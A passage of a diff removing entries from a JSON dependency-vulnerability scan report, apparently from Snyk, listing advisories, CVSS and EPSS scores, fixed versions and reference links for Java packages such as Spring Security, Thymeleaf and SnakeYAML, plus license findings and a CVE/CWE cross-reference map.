-            "severity": "high",
-            "type": "primary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N"
-          },
-          {
-            "assigner": "NVD",
-            "base_score": 7.4,
-            "cvss_version": "3.1",
-            "modified_at": "2025-04-03T01:13:32.404458Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 7.4,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:52:39.41667Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N"
-          }
-        ],
-        "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
-        "disclosed_at": "2024-02-19T00:00:00Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.78505",
-          "probability": "0.01227"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "not defined",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "not defined",
-              "type": "primary"
-            }
-          ],
-          "sources": []
-        },
-        "id": "SNYK-JAVA-ORGSPRINGFRAMEWORKSECURITY-6254467",
-        "initially_fixed_in_versions": [
-          "6.1.7",
-          "6.2.2"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2025-04-03T01:13:32.404458Z",
-        "package_name": "org.springframework.security:spring-security-core",
-        "package_version": "",
-        "published_at": "2024-02-20T18:52:25.235491Z",
-        "references": [
-          {
-            "title": "Advisory",
-            "url": "https://spring.io/security/cve-2024-22234"
-          },
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/spring-projects/spring-security/commit/750cb30ce44d279c2f54c845d375e6a58bded569"
-          }
-        ],
-        "severity": "high",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-ORGSPRINGFRAMEWORKSECURITY-6254468": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[6.1.0,6.1.7)",
-          "[6.2.0,6.2.2)"
-        ],
-        "created_at": "2024-02-20T14:02:11.188428Z",
-        "credits": [
-          "Rogério Sorroche"
-        ],
-        "cvss_base_score": 7.4,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 7.4,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-06T13:58:51.519414Z",
-            "severity": "high",
-            "type": "primary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N"
-          },
-          {
-            "assigner": "NVD",
-            "base_score": 7.4,
-            "cvss_version": "3.1",
-            "modified_at": "2025-04-03T01:13:32.404458Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 7.4,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:52:39.41667Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N"
-          }
-        ],
-        "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
-        "disclosed_at": "2024-02-19T00:00:00Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.78505",
-          "probability": "0.01227"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "not defined",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "not defined",
-              "type": "primary"
-            }
-          ],
-          "sources": []
-        },
-        "id": "SNYK-JAVA-ORGSPRINGFRAMEWORKSECURITY-6254468",
-        "initially_fixed_in_versions": [
-          "6.1.7",
-          "6.2.2"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2025-04-03T01:13:32.404458Z",
-        "package_name": "org.springframework.security:spring-security-oauth2-client",
-        "package_version": "",
-        "published_at": "2024-02-20T18:52:25.444192Z",
-        "references": [
-          {
-            "title": "Advisory",
-            "url": "https://spring.io/security/cve-2024-22234"
-          },
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/spring-projects/spring-security/commit/750cb30ce44d279c2f54c845d375e6a58bded569"
-          }
-        ],
-        "severity": "high",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-ORGSPRINGFRAMEWORKSECURITY-6254469": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[6.1.0,6.1.7)",
-          "[6.2.0,6.2.2)"
-        ],
-        "created_at": "2024-02-20T14:02:11.545975Z",
-        "credits": [
-          "Rogério Sorroche"
-        ],
-        "cvss_base_score": 7.4,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 7.4,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-06T13:58:51.519414Z",
-            "severity": "high",
-            "type": "primary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N"
-          },
-          {
-            "assigner": "NVD",
-            "base_score": 7.4,
-            "cvss_version": "3.1",
-            "modified_at": "2025-04-03T01:13:32.404458Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 7.4,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:52:39.41667Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N"
-          }
-        ],
-        "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
-        "disclosed_at": "2024-02-19T00:00:00Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.78505",
-          "probability": "0.01227"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "not defined",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "not defined",
-              "type": "primary"
-            }
-          ],
-          "sources": []
-        },
-        "id": "SNYK-JAVA-ORGSPRINGFRAMEWORKSECURITY-6254469",
-        "initially_fixed_in_versions": [
-          "6.1.7",
-          "6.2.2"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2025-04-03T01:13:32.404458Z",
-        "package_name": "org.springframework.security:spring-security-web",
-        "package_version": "",
-        "published_at": "2024-02-20T18:52:25.628501Z",
-        "references": [
-          {
-            "title": "Advisory",
-            "url": "https://spring.io/security/cve-2024-22234"
-          },
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/spring-projects/spring-security/commit/750cb30ce44d279c2f54c845d375e6a58bded569"
-          }
-        ],
-        "severity": "high",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-ORGSPRINGFRAMEWORKSECURITY-6457293": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,5.7.12)",
-          "[5.8.0,5.8.11)",
-          "[6.0.0,6.0.10)",
-          "[6.1.0,6.1.8)",
-          "[6.2.0,6.2.3)"
-        ],
-        "created_at": "2024-03-18T16:41:50.078238Z",
-        "credits": [
-          "pwnull"
-        ],
-        "cvss_base_score": 8.2,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 8.2,
-            "cvss_version": "3.1",
-            "modified_at": "2024-07-02T15:25:03.155646Z",
-            "severity": "high",
-            "type": "primary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 9.8,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-19T13:31:58.954143Z",
-            "severity": "critical",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
-          }
-        ],
-        "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N",
-        "disclosed_at": "2024-03-18T14:41:20Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.49623",
-          "probability": "0.00264"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "not defined",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "not defined",
-              "type": "primary"
-            }
-          ],
-          "sources": []
-        },
-        "id": "SNYK-JAVA-ORGSPRINGFRAMEWORKSECURITY-6457293",
-        "initially_fixed_in_versions": [
-          "5.7.12",
-          "5.8.11",
-          "6.0.10",
-          "6.1.8",
-          "6.2.3"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2024-07-02T15:25:03.155646Z",
-        "package_name": "org.springframework.security:spring-security-core",
-        "package_version": "",
-        "published_at": "2024-03-18T16:47:09.973265Z",
-        "references": [
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/spring-projects/spring-security/commit/a972338e1dacf82e9cbb669b04678e4d09eae695"
-          },
-          {
-            "title": "GitHub Issue",
-            "url": "https://github.com/spring-projects/spring-security/issues/14666"
-          },
-          {
-            "title": "Security Advisory",
-            "url": "https://spring.io/security/cve-2024-22257"
-          }
-        ],
-        "severity": "high",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-ORGSPRINGFRAMEWORKSECURITY-8309135": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,5.7.13)",
-          "[5.8.0,5.8.15)",
-          "[6.0.0,6.2.7)",
-          "[6.3.0,6.3.4)"
-        ],
-        "created_at": "2024-10-28T14:36:47.001791Z",
-        "credits": [
-          "tkswifty",
-          "d4y1ightl"
-        ],
-        "cvss_base_score": 9.1,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 9.1,
-            "cvss_version": "4.0",
-            "modified_at": "2025-02-26T08:12:24.134127Z",
-            "severity": "critical",
-            "type": "primary",
-            "vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"
-          },
-          {
-            "assigner": "Snyk",
-            "base_score": 7.4,
-            "cvss_version": "3.1",
-            "modified_at": "2025-02-26T08:12:24.134127Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N/E:P"
-          }
-        ],
-        "cvss_vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P",
-        "disclosed_at": "2024-10-22T00:00:00Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.94979",
-          "probability": "0.18565"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "proof of concept",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "proof of concept",
-              "type": "primary"
-            }
-          ],
-          "sources": [
-            "Snyk"
-          ]
-        },
-        "id": "SNYK-JAVA-ORGSPRINGFRAMEWORKSECURITY-8309135",
-        "initially_fixed_in_versions": [
-          "5.7.13",
-          "5.8.15",
-          "6.2.7",
-          "6.3.4"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2025-02-26T08:12:24.134127Z",
-        "package_name": "org.springframework.security:spring-security-web",
-        "package_version": "",
-        "published_at": "2024-10-28T15:50:16.752302Z",
-        "references": [
-          {
-            "title": "Blog",
-            "url": "https://www.deep-kondah.com/spring-webflux-static-resource-access-vulnerability-cve-2024-38821-explained/"
-          },
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/spring-projects/spring-security/commit/0e257b56ce35402558a260ffa6b368982f9a7934"
-          },
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/spring-projects/spring-security/commit/4ce7cde15599c0447163fd46bac616e03318bf5b"
-          },
-          {
-            "title": "PoC",
-            "url": "https://github.com/mouadk/cve-2024-38821"
-          },
-          {
-            "title": "Spring Security Advisory",
-            "url": "https://spring.io/security/cve-2024-38821"
-          }
-        ],
-        "severity": "critical",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-ORGSPRINGFRAMEWORKSECURITY-9486467": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,6.3.8)",
-          "[6.4.0,6.4.4)"
-        ],
-        "created_at": "2025-03-20T12:24:18.454675Z",
-        "credits": [
-          "Lars Bruun-Hansen"
-        ],
-        "cvss_base_score": 9,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 9,
-            "cvss_version": "4.0",
-            "modified_at": "2025-03-20T12:37:25.968817Z",
-            "severity": "critical",
-            "type": "primary",
-            "vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:H/SI:H/SA:N"
-          },
-          {
-            "assigner": "Snyk",
-            "base_score": 7.4,
-            "cvss_version": "3.1",
-            "modified_at": "2025-03-20T12:37:25.968817Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 7.4,
-            "cvss_version": "3.1",
-            "modified_at": "2025-03-21T13:34:06.998483Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N"
-          }
-        ],
-        "cvss_vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:H/SI:H/SA:N",
-        "disclosed_at": "2025-03-19T00:00:00Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.22314",
-          "probability": "0.00072"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "not defined",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "not defined",
-              "type": "primary"
-            }
-          ],
-          "sources": []
-        },
-        "id": "SNYK-JAVA-ORGSPRINGFRAMEWORKSECURITY-9486467",
-        "initially_fixed_in_versions": [
-          "6.3.8",
-          "6.4.4"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2025-03-21T13:34:06.998483Z",
-        "package_name": "org.springframework.security:spring-security-crypto",
-        "package_version": "",
-        "published_at": "2025-03-20T12:37:25.960064Z",
-        "references": [
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/spring-projects/spring-security/commit/46f0dc6dfc8402cd556c598fdf2d31f9d46cdbf3"
-          },
-          {
-            "title": "Vulnerability Advisory",
-            "url": "https://spring.io/security/cve-2025-22228"
-          }
-        ],
-        "severity": "critical",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-ORGTHYMELEAF-5811866": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,3.1.2.RELEASE)"
-        ],
-        "created_at": "2023-08-01T09:19:27.913503Z",
-        "credits": [
-          "p1n93r"
-        ],
-        "cvss_base_score": 9.8,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 9.8,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-06T13:55:52.349311Z",
-            "severity": "critical",
-            "type": "primary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P"
-          },
-          {
-            "assigner": "NVD",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:53:27.048353Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"
-          }
-        ],
-        "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P",
-        "disclosed_at": "2023-07-14T12:30:17Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.30654",
-          "probability": "0.00114"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "proof of concept",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "proof of concept",
-              "type": "primary"
-            }
-          ],
-          "sources": [
-            "Snyk"
-          ]
-        },
-        "id": "SNYK-JAVA-ORGTHYMELEAF-5811866",
-        "initially_fixed_in_versions": [
-          "3.1.2.RELEASE"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2024-03-11T09:53:27.048353Z",
-        "package_name": "org.thymeleaf:thymeleaf",
-        "package_version": "",
-        "published_at": "2023-07-14T12:42:34.052683Z",
-        "references": [
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/thymeleaf/thymeleaf/issues/966"
-          },
-          {
-            "title": "PoC",
-            "url": "https://github.com/p1n93r/SpringBootAdmin-thymeleaf-SSTI"
-          }
-        ],
-        "severity": "critical",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-ORGYAML-3152153": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[0,2.0)"
-        ],
-        "created_at": "2022-12-01T14:55:37.239974Z",
-        "credits": [
-          "Justin Taft",
-          "securisec"
-        ],
-        "cvss_base_score": 6.6,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 6.6,
-            "cvss_version": "3.1",
-            "modified_at": "2024-11-01T14:58:12.513862Z",
-            "severity": "medium",
-            "type": "primary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H/E:P"
-          },
-          {
-            "assigner": "NVD",
-            "base_score": 9.8,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:52:50.136076Z",
-            "severity": "critical",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 9.8,
-            "cvss_version": "3.1",
-            "modified_at": "2025-10-05T11:16:08.982757Z",
-            "severity": "critical",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
-          }
-        ],
-        "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H/E:P",
-        "disclosed_at": "2022-12-01T14:49:09Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.99860",
-          "probability": "0.93849"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "proof of concept",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "proof of concept",
-              "type": "primary"
-            }
-          ],
-          "sources": [
-            "Snyk"
-          ]
-        },
-        "id": "SNYK-JAVA-ORGYAML-3152153",
-        "initially_fixed_in_versions": [
-          "2.0"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2025-10-05T11:16:08.982757Z",
-        "package_name": "org.yaml:snakeyaml",
-        "package_version": "",
-        "published_at": "2022-12-08T18:58:07.087174Z",
-        "references": [
-          {
-            "title": "BitBucket Changelog",
-            "url": "https://bitbucket.org/snakeyaml/snakeyaml/wiki/Changes"
-          },
-          {
-            "title": "Bitbucket Commit",
-            "url": "https://bitbucket.org/snakeyaml/snakeyaml/commits/2b8d47c8bcfd402e7a682b7b2674e8d0cb25e522"
-          },
-          {
-            "title": "Bitbucket Issue",
-            "url": "https://bitbucket.org/snakeyaml/snakeyaml/issues/561/cve-2022-1471-vulnerability-in"
-          },
-          {
-            "title": "BitBucket Issue",
-            "url": "https://bitbucket.org/snakeyaml/snakeyaml/issues/565/do-not-allow-global-tags-by-default"
-          },
-          {
-            "title": "BitBucket PR",
-            "url": "https://bitbucket.org/snakeyaml/snakeyaml/pull-requests/39"
-          },
-          {
-            "title": "BitBucket PR",
-            "url": "https://bitbucket.org/snakeyaml/snakeyaml/pull-requests/44"
-          },
-          {
-            "title": "PoC",
-            "url": "https://github.com/1fabunicorn/SnakeYAML-CVE-2022-1471-POC"
-          },
-          {
-            "title": "Snyk Blog - Technical Deepdive",
-            "url": "https://snyk.io/blog/unsafe-deserialization-snakeyaml-java-cve-2022-1471/"
-          },
-          {
-            "title": "Vulnerable Class",
-            "url": "https://github.com/snakeyaml/snakeyaml/blob/master/src/main/java/org/yaml/snakeyaml/constructor/Constructor.java"
-          }
-        ],
-        "severity": "medium",
-        "source": "snyk_vuln"
-      },
-      "snyk:lic:maven:ch.qos.logback:logback-classic:(EPL-1.0_OR_LGPL-2.1)": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[0.9.18,)"
-        ],
-        "created_at": "2025-03-09T17:47:17.961Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "id": "snyk:lic:maven:ch.qos.logback:logback-classic:(EPL-1.0_OR_LGPL-2.1)",
-        "instructions": [],
-        "license": "(EPL-1.0 OR LGPL-2.1)",
-        "package_name": "ch.qos.logback:logback-classic",
-        "package_version": "",
-        "published_at": "2025-03-09T17:47:17.961Z",
-        "severity": "medium",
-        "source": "snyk_license"
-      },
-      "snyk:lic:maven:ch.qos.logback:logback-core:(EPL-1.0_OR_LGPL-2.1)": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[0.9.18,)"
-        ],
-        "created_at": "2025-03-09T16:21:02.569Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "id": "snyk:lic:maven:ch.qos.logback:logback-core:(EPL-1.0_OR_LGPL-2.1)",
-        "instructions": [],
-        "license": "(EPL-1.0 OR LGPL-2.1)",
-        "package_name": "ch.qos.logback:logback-core",
-        "package_version": "",
-        "published_at": "2025-03-09T16:21:02.569Z",
-        "severity": "medium",
-        "source": "snyk_license"
-      },
-      "snyk:lic:maven:com.github.jnr:jnr-posix:(EPL-1.0_OR_GPL-2.0_OR_LGPL-2.1)": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[3.0.45,)"
-        ],
-        "created_at": "2025-03-10T06:17:06.524Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "id": "snyk:lic:maven:com.github.jnr:jnr-posix:(EPL-1.0_OR_GPL-2.0_OR_LGPL-2.1)",
-        "instructions": [],
-        "license": "(EPL-1.0 OR GPL-2.0 OR LGPL-2.1)",
-        "package_name": "com.github.jnr:jnr-posix",
-        "package_version": "",
-        "published_at": "2025-03-10T06:17:06.524Z",
-        "severity": "high",
-        "source": "snyk_license"
-      },
-      "snyk:lic:maven:org.hibernate.common:hibernate-commons-annotations:LGPL-2.1": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[4.0.0.CR1,)"
-        ],
-        "created_at": "2025-03-09T20:04:52.151Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "id": "snyk:lic:maven:org.hibernate.common:hibernate-commons-annotations:LGPL-2.1",
-        "instructions": [],
-        "license": "LGPL-2.1",
-        "package_name": "org.hibernate.common:hibernate-commons-annotations",
-        "package_version": "",
-        "published_at": "2025-03-09T20:04:52.151Z",
-        "severity": "medium",
-        "source": "snyk_license"
-      },
-      "snyk:lic:maven:org.hibernate.orm:hibernate-core:LGPL-2.1": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[6.0.0.Alpha1, 7.0.0.Beta5)"
-        ],
-        "created_at": "2025-03-29T14:42:52.934Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "id": "snyk:lic:maven:org.hibernate.orm:hibernate-core:LGPL-2.1",
-        "instructions": [],
-        "license": "LGPL-2.1",
-        "package_name": "org.hibernate.orm:hibernate-core",
-        "package_version": "",
-        "published_at": "2025-03-29T14:42:52.934Z",
-        "severity": "medium",
-        "source": "snyk_license"
-      },
-      "snyk:lic:maven:org.jruby:dirgra:EPL-1.0": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[0.1, 0.5)"
-        ],
-        "created_at": "2025-03-13T00:51:41.706Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "id": "snyk:lic:maven:org.jruby:dirgra:EPL-1.0",
-        "instructions": [],
-        "license": "EPL-1.0",
-        "package_name": "org.jruby:dirgra",
-        "package_version": "",
-        "published_at": "2025-03-13T00:51:41.706Z",
-        "severity": "medium",
-        "source": "snyk_license"
-      }
-    },
-    "_problemRefs": {
-      "00000001-0000-4000-8000-000000000001": [
-        "GHSA-w6qf-42m7-vh68",
-        "CVE-2024-1635",
-        "CWE-400",
-        "SNYK-JAVA-IOUNDERTOW-7984545"
-      ],
-      "00000003-0000-4000-8000-000000000003": [
-        "SNYK-JAVA-ORGBITBUCKETBC-6139942",
-        "CVE-2023-51775",
-        "CWE-400"
-      ],
-      "00000004-0000-4000-8000-000000000004": [
-        "SNYK-JAVA-CHQOSLOGBACK-6097492",
-        "CWE-400",
-        "CVE-2023-6481"
-      ],
-      "00000005-0000-4000-8000-000000000005": [
-        "snyk:lic:maven:org.hibernate.common:hibernate-commons-annotations:LGPL-2.1"
-      ],
-      "00000006-0000-4000-8000-000000000006": [
-        "CWE-20",
-        "SNYK-JAVA-IOUNDERTOW-6567186",
-        "CVE-2023-1973"
-      ],
-      "00000007-0000-4000-8000-000000000007": [
-        "CVE-2024-38816",
-        "SNYK-JAVA-ORGSPRINGFRAMEWORK-7945490",
-        "CWE-22"
-      ],
-      "00000008-0000-4000-8000-000000000008": [
-        "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1040458",
-        "GHSA-mw36-7c6c-q4q2",
-        "CWE-502",
-        "CVE-2020-26217"
-      ],
-      "00000009-0000-4000-8000-000000000009": [
-        "CWE-434",
-        "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569177",
-        "GHSA-g5w6-mrj7-75h2",
-        "CVE-2021-39141"
-      ],
-      "0000000a-0000-4000-8000-00000000000a": [
-        "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-8352924",
-        "GHSA-hfq9-hggm-c56q",
-        "CWE-502",
-        "CVE-2024-47072"
-      ],
-      "0000000b-0000-4000-8000-00000000000b": [
-        "CVE-2013-7285",
-        "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-460764",
-        "CWE-94"
-      ],
-      "0000000d-0000-4000-8000-00000000000d": [
-        "SNYK-JAVA-ORGSPRINGFRAMEWORK-10345766",
-        "CVE-2025-41234",
-        "CWE-113"
-      ],
-      "0000000e-0000-4000-8000-00000000000e": [
-        "SNYK-JAVA-ORGSPRINGFRAMEWORK-12008931",
-        "CWE-23",
-        "CVE-2025-41242"
-      ],
-      "0000000f-0000-4000-8000-00000000000f": [
-        "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088337",
-        "CVE-2021-21341",
-        "GHSA-2p3x-qw9c-25hh",
-        "CWE-502"
-      ],
-      "00000010-0000-4000-8000-000000000010": [
-        "snyk:lic:maven:org.jruby:dirgra:EPL-1.0"
-      ],
-      "00000011-0000-4000-8000-000000000011": [
-        "CWE-200",
-        "GHSA-rgh3-987h-wpmw",
-        "CVE-2016-3674",
-        "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-30385"
-      ],
-      "00000012-0000-4000-8000-000000000012": [
-        "CVE-2024-7885",
-        "SNYK-JAVA-IOUNDERTOW-7707751",
-        "GHSA-9623-mqmm-5rcf",
-        "CWE-362"
-      ],
-      "00000013-0000-4000-8000-000000000013": [
-        "CVE-2024-22234",
-        "SNYK-JAVA-ORGSPRINGFRAMEWORKSECURITY-6254469",
-        "CWE-287"
-      ],
-      "00000014-0000-4000-8000-000000000014": [
-        "GHSA-h7v4-7xg3-hxcc",
-        "CWE-434",
-        "CVE-2021-39147",
-        "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569182"
-      ],
-      "00000015-0000-4000-8000-000000000015": [
-        "SNYK-JAVA-CHQOSLOGBACK-13169722",
